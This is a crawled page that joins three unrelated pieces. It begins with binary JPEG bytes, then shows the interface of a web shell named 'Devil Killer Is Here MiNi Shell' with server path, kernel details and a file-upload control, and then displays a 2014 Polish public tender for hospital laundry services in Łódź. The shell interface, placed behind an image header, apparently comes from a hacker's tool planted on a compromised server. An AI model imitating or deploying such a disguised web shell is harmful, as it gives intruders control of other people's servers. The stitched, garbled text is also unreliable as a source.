JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140710/150549-N-2014.html

<p class="kh_header"><b>Łódź: Świadczenie usług pralniczych dla Wojewódzkiego Specjalistycznego Szpitala 
im. M. Pirogowa w Łodzi</b><br>
<b>Numer ogłoszenia: 150549 - 2014; data zamieszczenia: 10.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi , ul. Wólczańska 191/195, 90-531 Łódź, woj. łódzkie, tel. 042 6371322, faks 042 6371322.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pirogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pralniczych dla Wojewódzkiego Specjalistycznego Szpitala 
im. M. Pirogowa w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa usługa pralnicza obejmująca: Pranie, płukanie przy użyciu płynu antystatycznego w zależności od potrzeb, dezynfekcję, suszenie i odpylenie, maglowanie, prasowanie i bieżącą reparację - naprawę - bielizny pościelowej, fartuchów i odzieży ochronnej, bielizny operacyjnej prostej i fasonowej, pieluch, piżam, koszul, ścierek, zasłon, koców, poduszek z pierza i silikonu, pokrowców na materace. Pranie pieluch i bielizny noworodkowej. Dezynfekcję i pranie bielizny zakaźnej. Segregację i pakowanie bielizny. Rodzaje asortymentu podlegającego praniu i serwisowi bieliźniarskiemu określone są w załączniku nr 2 do SIWZ.  Przykładowy asortyment: - bielizna pościelowa (poszwy, poszewki, prześcieradła, podkłady itp.) - bielizna szpitalna (piżamy, koszule, szlafroki itp.) - bielizna noworodkowa (ubranka, pieluchy, pościel itp.) - odzież robocza (kombinezony, koszule flanelowe, kurtki watowane, peleryny pielęgniarskie itp.) - odzież ochronna (garsonki, ubrania lekarskie, fartuchy lekarskie, fartuchy i ubrania operacyjne itp.) - pozostałe wyroby tj.: obrusy, zasłony, koce, materace, poduszki z pierza i silikonu, mopy, ścierki, pokrowce na materace itp. Miejsce świadczenia usług Usługa wykonywana będzie dla Wojewódzkiego Specjalistycznego Szpitala im. M. Pirogowa w Łodzi obejmująca obiekty położone przy: ul. Wólczańskiej 191/195 w Łodzi,  ul. Wileńskiej 37 w Łodzi. Wymagania ogólne: Pranie winno odbywać się zgodnie z wymogami sanitarno - epidemiologicznymi w pralni z zachowaniem bariery sanitarno - higienicznej oraz wyposażonej w: prapralnicę tunelową z automatycznym dozowaniem środków piorąco - dezynfekujących z zachowaniem procesów prania i dezynfekcji w zależności od asortymentu, skażenia bielizny oraz zgodnie z technologią i warunkami obowiązującymi w zakresie prania bielizny dla placówek ochrony zdrowia (lecznictwa otwartego i zamkniętego) z zastosowaniem preparatów posiadających odpowiednie dokumenty dopuszczające do stosowania zgodnie z obowiązującymi przepisami: - w przypadku preparatów sklasyfikowanych jako wyroby medyczne wykonawca winien posiadać pozwolenie na obrót zgodnie z Ustawą o wyrobach medycznych dnia 20 maja 2010r. (Dz. U. 2010r. Nr 107, poz. 679 z późn. zm.); w przypadku preparatów sklasyfikowanych jako produkty biobójcze wykonawca winien posiadać pozwolenie na obrót produktem biobójczym na terenie Polski zgodnie Ustawą o produktach biobójczych z dnia 13 września 2002r. (tekst jedn. Dz. U. z 2007r. Nr 39, poz. 252 z późn. zm.), środki piorące i dezynfekujące, które gwarantują pełne spektrum działania: B, F, V (HIV, HBV) Tbc (czyli bakterie, grzyby, wirusy, prątki gruźlicy) oraz gwarantują właściwą jakość prania nie powodującą przyspieszonego zużycia bielizny zgodnie z komunikatem Głównego Inspektora Sanitarnego z dnia 27.09.1996r. w sprawie wykazu preparatów dezynfekcyjnych przeznaczonych do stosowania w ZOZ c) w przypadku bielizny zakaźnej, środki posiadające pełne spektrum działania: B, F, V (HIV, HBV), Tbc, S (spory) w tym Clostridium difficile oraz gwarantujące właściwą jakość prania nie powodującą przyspieszonego zużycia bielizny zgodnie z komunikatem Głównego Inspektora Sanitarnego z dnia 27.09.1996r. w sprawie wykazu preparatów dezynfekcyjnych przeznaczonych do stosowania w ZOZ. Wykonawca winien posiadać certyfikat potwierdzający wdrożenie w pralni, w której będą świadczone usługi pralnicze systemu Analizy Ryzyka i Kontroli Skażenia Biologicznego RABC, spełniający normę PN-EN 14065/RABC. Wykonawca zobowiązany jest do utrzymania wdrożonego systemu RABC przez cały okres obowiązywania umowy. Wykonawca winien posiadać aktualną opinię sanitarną wydaną przez właściwego Państwowego Inspektora Sanitarnego, dotyczącą dopuszczenia pojazdu/pojazdów do przewozu bielizny szpitalnej. Pralnia musi posiadać pozytywną opinię lub decyzję Sanepidu odnośnie wykonywania usług pralniczych dla placówek ochrony zdrowia. Wymagania szczegółowe: Bielizna zakaźna winna być oddzielnie prana z zachowaniem obowiązujących barier higienicznych - wydzielone pralnice i inne urządzenia dla bielizny zakaźnej. Bielizna noworodkowa oddzielnie prana z zachowaniem zaleceń Instytutu Matki i Dziecka oraz producenta bielizny z zachowaniem obowiązujących barier higienicznych - wydzielone pralnice i inne urządzenia dla bielizny noworodkowej. Sortowanie wypranej bielizny oddzielne. Bielizna operacyjna prana oddzielnie - nie należy łączyć z pozostałą bielizną z innych oddziałów. Bielizna fasonowa prana oddzielnie - nie należy łączyć z pozostałą bielizną z innych oddziałów. Wyładunek bielizny z samochodu do pralni oraz załadunek z pralni do samochodu winien odbywać się na wózkach jezdnych.  Pralnia powinna być wyposażona w urządzenie do dezynfekcji wózków. Środki transportu brudnej i czystej bielizny winny być oddzielne lub posiadać szczelną i podzieloną komorę załadunkową tak, aby bielizna czysta  nie miała możliwości jakiegokolwiek kontaktu z bielizną brudną.  Wymagania dotyczące technologii prania:  Pranie winno odbywać się zgodnie z wymogami obowiązującymi w placówkach ochrony zdrowia ze szczególnym uwzględnieniem zaleceń dotyczących szpitali.  Pranie w zakresie temperatury 40oC - 90oC w zależności od rodzaju pranego asortymentu i ewentualnych potrzeb zamawiającego.  Środki piorąco - dezynfekujące: winny posiadać dokumenty dopuszczające do stosowania z uwzględnieniem środków piorących i dezynfekujących w temperaturze od 40oC do 90oC.
Dozowanie środków piorąco - dezynfekujących winno być automatyczne. Bielizna zakaźna winna być prana w wydzielonych urządzeniach. Bielizna noworodkowa winna być prana w wydzielonych urządzeniach. Bielizna operacyjna winna być prana w osobnych urządzeniach, suszona, odpylona, maglowana. Bielizna fasonowa winna być prana w osobnych urządzeniach, nie należy łączyć z pozostałą bielizną z innych oddziałów, suszona, prasowana. Ważenie czystej suchej bielizny winno odbywać się po stronie czystej pralni. Sposób pakowania upranej bielizny Uprana bielizna winna być pakowana asortymentowo, posegregowana na poszczególne oddziały, zawartość każdej paczki trwale opisana na opakowaniu co do jej zawartości oraz wagi, z określeniem ilości sztuk poszczególnego rodzaju bielizny bielizna noworodkowa pakowana oddzielnie, bielizna płaska pakowana asortymentowo w folie zgrzane obustronnie, ubrania operacyjne i fartuchy pakowane asortymentowo w folie zgrzane obustronnie, bielizna fasonowa opakowana w worki foliowe dostarczana na wieszakach. W przypadku konieczności zmiany środka piorącego (piorąco - dezynfekującego), wykonawca winien poinformować zamawiającego pisemnie na 7 dni przed wdrożeniem do użycia. Maksymalne dopuszczenie pakowania asortymentu w paczce: Poszwy 5 szt., Prześcieradła 10 szt., Poszewki 20 szt., Podkłady 20 szt., Koszule 5 szt., Fartuch zielone operacyjne 10 szt., Ubrania zielone operacyjne 10 szt., Bluzy piżamowe 5 szt., Spodnie piżamowe 5 szt., Bielizna  noworodkowa  oddzielnie sortowana, Ścierki 10 szt., Ręczniki 5 szt., Szlafroki 5 szt., Koce 1 szt., Poduszki z pierza 1 szt., Odzież fasonowa biała: fartuchy, garsonki, ubrania 1szt. - na wieszaku foliowana. Wymagania dotyczące odbioru bielizny brudnej i przywozu bielizny czystej: Przywóz czystej bielizny i odbiór brudnej odbywać się będzie na koszt i środkami transportu wykonawcy. Koszty transportu winny być zawarte w cenie jednostkowej  za pranie. Obiekt przy ul. Wólczańskiej 191 195: Odbiór bielizny brudnej: odbiór bielizny brudnej do prania odbywać się będzie dwa razy dziennie w dni robocze o godz. od 800 do 900 rano i po południu o godz. 1300 do 1340 w soboty oraz inne dni wolne raz dziennie rano od 800 do 900, w przypadku dni świątecznych przerwa nie może być dłuższa niż 1 dzień. Bielizna przeznaczona do prania pakowana będzie przez Zamawiającego w worki foliowe dostarczone przez Wykonawcę na jego koszt. Przywóz upranej bielizny: przywóz upranej bielizny odbywać się będzie raz dziennie w dni robocze o godz. od 800 do 900 rano w soboty oraz inne dni wolne raz dziennie rano o godz. od 800 do 900, w przypadku dni świątecznych przerwa nie może być dłuższa niż 1 dzień. Uprana bielizna winna być segregowana, wysuszona i pakowana asortymentowo. Czas realizacji usługi:  - prania bielizny pościelowej białej, operacyjnej, fasonowej, noworodkowej, koszul, piżam, ścierek, pokrowców na materace itp. - do 24h, - prania pozostałego asortymentu takiego jak poduszki, koce, szlafroki - do 48h. Obiekt przy ul. Wileńskiej 37: Odbiór bielizny brudnej: odbiór bielizny brudnej do prania odbywać się będzie raz dziennie od poniedziałku do soboty włącznie w godzinach od 1330 do 1500. W przypadku dni świątecznych przerwa nie może być dłuższa niż 1 dzień. Bielizna przeznaczona do prania  pakowana będzie przez zamawiającego w worki foliowe dostarczone przez wykonawcę na jego koszt. Przywóz upranej bielizny: przywóz upranej bielizny odbywać się będzie raz dziennie od poniedziałku do soboty włącznie w godzinach od 800 do 1000. W przypadku dni świątecznych przerwa nie może być dłuższa niż 1 dzień. Uprana bielizna winna być segregowana, wysuszona i pakowana asortymentowo. Czas realizacji usługi: prania bielizny pościelowej białej, operacyjnej, fasonowej, noworodkowej, koszul, piżam, ścierek, pokrowców na materace itp. - do 24h,  pozostałego asortymentu takiego jak poduszki, koce, szlafroki - do 48h.   Wykonawca w ramach umowy zobowiązany będzie do: Dostarczenia zamawiającemu w odpowiedniej ilości - wózków transportowych do przewożenia bielizny brudnej oraz bielizny czystej na oddziały szpitalne i do punktów zdawczo - odbiorczych; wózki winny być zaopatrzone w pokrowce chroniące bieliznę przed zabrudzeniem, przemoczeniem w czasie przewożenia bielizny na oddział: obiekt przy ul. Wileńskiej 37 -  5 szt., obiekt przy ul. Wólczańskiej 191/195 - 5 szt., opakowań (worki foliowe) do przekazywania brudnej bielizny zgodnie z obowiązującymi kolorami w szpitalu - obiekt przy ul. Wileńskiej 37 - 50 szt. dziennie (120L), obiekt przy ul. Wólczańskiej 191195  - 60 szt. dziennie (120L). Zapotrzebowanie zamawiającego uwarunkowane jest ilością hospitalizowanych chorych i ilością oddawanej bielizny do prania, podane ilości worków są orientacyjne. Prowadzenia serwisu bieliźniarskiego: naprawy, zszywania, cerowania, przyszywania guzików i troków, łatanie dziur, cerowanie, wymiana na nowe zamki i guziki zniszczone podczas prania lub maglowania wykonania tych czynności podczas jednego cyklu zdawczo - odbiorczego. Prowadzenia dokumentacji zdawczo - odbiorczej brudnej i czystej bielizny wg kwitów opracowanych przez wykonawcę w uzgodnieniu z zamawiającym. Kwity dostarczy wykonawca. Sortowania czystej bielizny z zachowaniem podziału na asortyment i komórkę przeznaczenia wg potrzeb zamawiającego. Niezwłoczne i nieodpłatne usuwania stwierdzonych wad jakościowych wykonywanej usługi zgłoszonych przez zamawiającego. Czas realizacji 24h. Wykonawca ponosić będzie odpowiedzialność prawną i materialną za wykonanie usługi pralniczej w zakresie jakości i zgodności z wymogami sanitarnymi wobec organów kontroli (dotyczy m.in.: Stacji Sanitarno - Epidemiologicznej oraz przepisów BHP). Wykonawca zobowiązany będzie do prowadzenia kontroli wypranej bielizny, dezynfekcji wózków transportowych i pokrowców na wózki pod względem sanitarno - epidemiologicznym w trakcie trwania umowy, w tym kontroli czystości mikrobiologicznej.  Wykonawca raz w miesiącu będzie zobowiązany do przedstawienia zamawiającemu wyników badań mikrobiologicznych na: czystość pranej bielizny, czystości środków transportu bielizny (wózki transportowe, samochody). W razie awarii urządzeń pralniczych, wykonawca zobowiązany będzie do wykonywania usługi w pralni zastępczej spełniającej wymagania zamawiającego opisane w niniejszej SIWZ. W przypadku protokolarnego stwierdzenia złego stanu czystości, a w szczególności gdy bielizna będzie niedoprana (np. niedopranie plam z krwi) lub wilgotna, złego stanu bakteryjnego bielizny wykonawca zobowiązuje się na własny koszt do ponownego uprania zanieczyszczonej/wilgotnej bielizny. W przypadku mechanicznego uszkodzenia bielizny lub zagubienia asortymentu przekazanego do prania i przyjętego przez wykonawcę, wykonawca winien wymienić uszkodzone lub zagubione egzemplarze na nowe lub zapewnić zwrot ich równowartości ustalonej wg aktualnych na dzień zwrotu cen zakupu - czas realizacji do 14 dni. W przypadku ujawnienia braków ilościowych lub złej jakości prania, zamawiający w terminie 24 godzin powiadomi wykonawcę, który zobowiązany jest usunąć braki ilościowe lub wady jakościowe najpóźniej w ciągu 24 godzin od chwili zgłoszenia. Wykonawca na każdy obiekt osobno wystawi fakturę VAT z określeniem asortymentu pranej bielizny, ilości i ceny jednostkowej na koniec każdego miesiąca. Faktura ta będzie wystawiona na podstawie miesięcznego zestawienia wypranej bielizny potwierdzonego przez uprawnionego pracownika zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia przez wykonawców wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa opisu sposobu dokonywania oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wykonali w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa (2) zadania (zrealizowane w ramach odrębnych umów) polegające na usłudze obejmującej łącznie pranie, suszenie i obróbkę (prasowanie, maglowanie) pościeli i bielizny szpitalnej wraz z usługą transportu, o rocznej wartości nie mniejszej niż 250 000,00 zł. brutto - każda usługa.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadają przynajmniej dwa (2) środki transportu do przewozu bielizny czystej i brudnej bielizny wraz    z aktualnymi opiniami sanitarnymi wydanymi przez Państwowy Inspektorat Sanitarno - Epidemiologiczny dotyczącymi środków transportu bielizny szpitalnej,
posiadają pralnię spełniającą wymagania w zakresie prania bielizny dla jednostek ochrony zdrowia (lecznictwa otwartego i zamkniętego) z zachowaniem bariery sanitarno - higienicznej oraz wyposażoną w: pralnicę tunelową z automatycznym dozowaniem środków piorąco dezynfekujących, urządzenie do dezynfekcji wózków, wydzieloną pralnicę i inne urządzenia dla bielizny zakaźnej, wydzieloną pralnicę i inne urządzenia dla bielizny noworodkowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. wykazując, że posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości sumy ubezpieczenia nie mniejszej niż 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie wykonawcy - wzór druku oświadczenia stanowi załącznik nr 3 do SIWZ, że pralnia, w której będzie wykonywana usługa spełnia wymagania w zakresie prania bielizny dla jednostek ochrony zdrowia (lecznictwa otwartego i zamkniętego) i jest wyposażona w: w barierę sanitarno - higieniczną, pralnicę tunelową z automatycznym dozowaniem środków piorąco - dezynfekujących, automatyczne dozowanie środków, wydzielone pralnice i inne urządzenia dla bielizny zakaźnej, wydzielone pralnice i inne urządzenia dla bielizny noworodkowej. Oświadczenie wykonawcy - wzór druku oświadczenia stanowi załącznik nr 3 do SIWZ, że zobowiązuje się do dostarczenia zamawiającemu w odpowiedniej ilości: wózków transportowych do przewożenia bielizny brudnej czystej na oddziały szpitalne i do punktów zdawczo - odbiorczych, opakowań (worki foliowe) do przekazywania brudnej bielizny zgodnie z obowiązującymi kolorami. Oświadczenie wykonawcy o posiadaniu dokumentów dopuszczających do obrotu i stosowania na terenie RP używanych środków piorących i dezynfekujących i biobójczych, zgodnie z obowiązującymi przepisami oraz posiadaniu pozytywnej opinii Instytutu Matki i Dziecka lub Centrum Zdrowia Dziecka dla środków do prania bielizny noworodkowej, niemowlęcej i dziecięcej oraz że: stosuje środki piorące i dezynfekujące odpowiednie do poszczególnych rodzajów materiałów i tkanin z uwzględnieniem temperatur od 40 oC do 90 oC, które gwarantują: pełne spektrum działania: B, F,V (HIV, HBV), Tbc i gwarantują właściwą jakość prania nie powodującą przyspieszonego zużycia bielizny zgodnie z komunikatem Głównego Inspektora - Sanitarnego z dnia 27.09.1996r. w sprawie wykazu preparatów dezynfekcyjnych przeznaczonych w ZOZ a w przypadku bielizny zakaźnej stosowanie środków posiadających pełne spektrum działania: B, F, V (HIV, HBV), Tbc, S (spory) w tym Clostridium difficile i gwarantują właściwą jakość prania nie powodującą przyspieszonego zużycia bielizny zgodnie z komunikatem Głównego Inspektora - Sanitarnego z dnia 27.09.1996r. w sprawie wykazu preparatów dezynfekcyjnych przeznaczonych w ZOZ. - wzór druku oświadczenia stanowi załącznik nr 3 do SIWZ. 
Zamawiający zastrzega sobie prawo zażądania dokumentów do wglądu przed podpisaniem umowy z wybranym Wykonawcą.
Kserokopię certyfikatu potwierdzającego wdrążenie w pralni, w której będą świadczone usługi pralnicze systemu Analizy Ryzyka i Kontroli Skażenia Biologicznego RABC, spełniający normę PN-EN 14065/RABC.
